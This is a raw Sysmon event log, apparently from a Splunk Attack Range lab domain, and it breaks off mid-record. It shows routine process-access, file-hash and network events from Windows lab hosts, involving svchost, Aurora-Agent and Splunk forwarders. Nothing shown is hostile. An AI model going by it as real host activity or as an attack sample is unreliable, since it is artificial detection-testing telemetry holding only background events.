10341000x800000000000000045181Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:14.284{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045180Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:14.284{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045179Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:14.284{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045178Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:14.284{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045177Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:14.284{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045176Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:14.284{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045175Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:14.283{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045174Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:14.283{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045173Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:14.283{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045172Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:14.283{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045171Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:14.283{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045170Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:14.275{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2C00-00000000AF02}1648C:\Windows\System32\vds.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045169Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:14.274{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2A00-00000000AF02}2844C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 23542300x800000000000000045168Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:14.067{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A363F6E58EC831E09044186B94A1BA6B,SHA256=BC42FD149E0193CF1707C10B59D3C8D5DF978328A8EE806A0B379237946FECEC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017621Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:15.574{E5A8D418-DC44-63C7-1B00-00000000B002}1944NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0027b8f3633f25268\channels\health\respondent-20230118114719-037MD5=2BA10D7196373860DD67B47CDBC7ACF2,SHA256=36B87809E8BE9B960CE5E03B4CEC64D52EF7C46D9877F9C3402AB54869FC5CBA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000017620Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:15.396{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F89A93F0E4D9E8B369D7A08E0847777,SHA256=9745311AD929405BD494BDA7DB26C2DB5D46EA6EBD110A004F817578E93357BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045233Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:15.712{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\ProgramData\Foxit Software\Foxit PDF Reader\FoxitSensor\Sensor.db-journalMD5=EBFCF9F9D4D52FE69EDF7350563650AF,SHA256=60228747C4B61BF27AFD139A67BB06FAE5408542AA98C5F70C0F53F87FA7E67F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000045232Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:15.305{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7951ABF86A677B3DA26DB1E4C462967,SHA256=2E889354FCE4E605FA199BB39A7601EF54557322A5CAA9132B619387EE7E4D54,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000045231Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:15.305{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D06A9BF803F2BED06B2B25D7F8CA986,SHA256=4799283E2E81630D762E4CEB93DFAF263610A52CD5FBFF05FCE0255B10E4F80A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017624Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:16.570{E5A8D418-DC44-63C7-1B00-00000000B002}1944NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0027b8f3633f25268\channels\health\surveyor-20230118114717-038MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000017623Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:16.475{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4CEDE8E3B3B24E2797F3559DA925F11F,SHA256=5962DE0CBBD454261BFBDC94D05683999BEBF098CF7A792F6F35BE564C960609,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000017622Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:16.460{E5A8D418-DC43-63C7-1200-00000000B002}1012NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=38C6BD490C675CB6CAA8821022FEAF97,SHA256=089105F6A6A55033DA11246CF7D3DC79D03E1511E8F8A88D043578C5BFED09BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045235Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:16.398{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C2E52109C76273C4C3AA5C72475E70D,SHA256=43C3635AD195BAD8B4346FCC504F532EA686D1A54294AF011FCBB5A934774144,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000045234Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:13.650{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56416-false10.0.1.12-8000- 23542300x800000000000000017626Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:17.560{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1EE317EEC08A83A6302050D177C838DA,SHA256=055980FF149E99C1A5826F180C4DDA14A55D34F2BD71CE61504E246C93C42963,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045236Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:17.394{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=69F17E30F1AB73F1FC4F93943FAD63B3,SHA256=6DFB076E33B257F27C52A06BE978CDFBADEA41D8B9925F5B15B2C40AC4846D8F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000017625Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:15.961{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50146-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000017627Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:18.651{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D075AE502AE2698045C1F914BB80A28,SHA256=A89DCA53E871C63F05BAC93277E78211865A8BAD4493E290230E2F59848501F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045237Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:18.497{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=03A12B02F2348BCB8CD835D566E825D5,SHA256=BBD9985A9403057E5F2EFC2EC13F556A3E01AB8A35C68D00AAFBC307FC86763B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017628Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:19.752{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B89CAB5BE41336C9139DA1BF0274808,SHA256=6DFA9EFC7D37E21AF75F8E985396835FBC1AD60D18C558891051AF3038E6F6E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045238Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:19.590{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D602E07A92E6E7C8B9C62F9EE280CE8,SHA256=F1D0D30C618AFDA7AA8A114858CDE513DB490731813C69C0A0657024FE23B632,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017629Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:20.822{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=012CD0FD22E3563237CD070D43C1363E,SHA256=03A78AF713268FFB55A5ABA73A541C99C50D921860999FD80DEB17537A9006D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045239Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:20.675{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28D30EEC63810F73208EB63DAE957A19,SHA256=A2603D7F2A1ECB0E15EE63B50D21DDA6D7CBD3BA1DA8FD6C6C39DC32A5A8B9A5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017630Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:21.907{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0725F1C5599B64AD0CFADE2C0A6DC2A9,SHA256=43E4C7D13FA70CC73A24CD1264FEF9FE5FBCED7EB8120C3140C2DE04EFEE96DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045240Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:21.747{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2A848568492988651485CC481F2ED0E,SHA256=A4F8CF45E01868E3C440347CABB077AC7642FC6019C4F55974D8A1248BBBC326,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000045242Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:22.826{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0EE931404B1E5CDB34A9E6D0F3C1FB1,SHA256=3F11186E538A8E4B7BEB53397F1CFA646796A8470B1BE14BF56FD56BCED0ACB8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000017661Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:22.754{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCCE-63C7-EB00-00000000B002}3756C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017660Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:22.750{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017659Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:22.749{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-A300-00000000B002}968C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017658Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:22.740{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program 